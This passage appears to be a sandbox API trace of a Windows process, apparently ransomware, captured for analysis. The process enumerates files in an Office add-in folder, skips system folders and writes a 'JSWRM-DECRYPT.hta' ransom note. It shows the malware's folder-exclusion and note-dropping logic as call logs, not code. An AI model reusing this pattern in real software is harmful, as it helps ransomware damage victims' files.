lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d800, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.402] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x860e337, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x860e337, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d728, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dba8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.402] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf126aeb1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf126aeb1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12b7378, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x76040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.402] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.403] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5c164a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15ac8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d800, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.403] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d920, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.403] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf75a8fbb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf75a8fbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf75a8fbb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.403] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.404] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5c164a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5e78ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.404] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20d578, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.404] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa5581c0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MI5889~1.DLL")) returned 1 [0126.404] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.430] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.430] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd422, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xfbd422, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xfe368d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e40, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.430] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.430] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.430] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.430] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.430] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.430] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.430] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.431] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.431] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.431] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.431] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd422, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xfbd422, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xfe368d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e40, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.431] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0126.431] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0126.431] lstrcmpiW (lpString1="en", lpString2=".") returned 1 [0126.431] lstrcmpiW (lpString1="en", lpString2="..") returned 1 [0126.431] lstrcmpiW (lpString1="en", lpString2="...") returned 1 [0126.431] lstrcmpiW (lpString1="en", lpString2="windows") returned -1 [0126.431] lstrcmpiW (lpString1="en", lpString2="recovery") returned -1 [0126.431] lstrcmpiW (lpString1="en", lpString2="perflogs") returned -1 [0126.431] lstrcmpiW (lpString1="en", lpString2="documents and settings") returned 1 [0126.431] lstrcmpiW (lpString1="en", lpString2="$RECYCLE.BIN") returned 1 [0126.431] lstrcmpiW (lpString1="en", lpString2="system volume information") returned -1 [0126.431] lstrcmpiW (lpString1="en", lpString2="msocache") returned -1 [0126.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\en\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\en\\jswrm-decrypt.hta")) returned 0xffffffff [0126.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.432] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\en\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\en\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.433] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.433] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.434] CloseHandle (hObject=0x314) returned 1 [0126.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\en\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\en\\jswrm-decrypt.hta")) returned 0x20 [0126.434] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\en\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4204a11a, 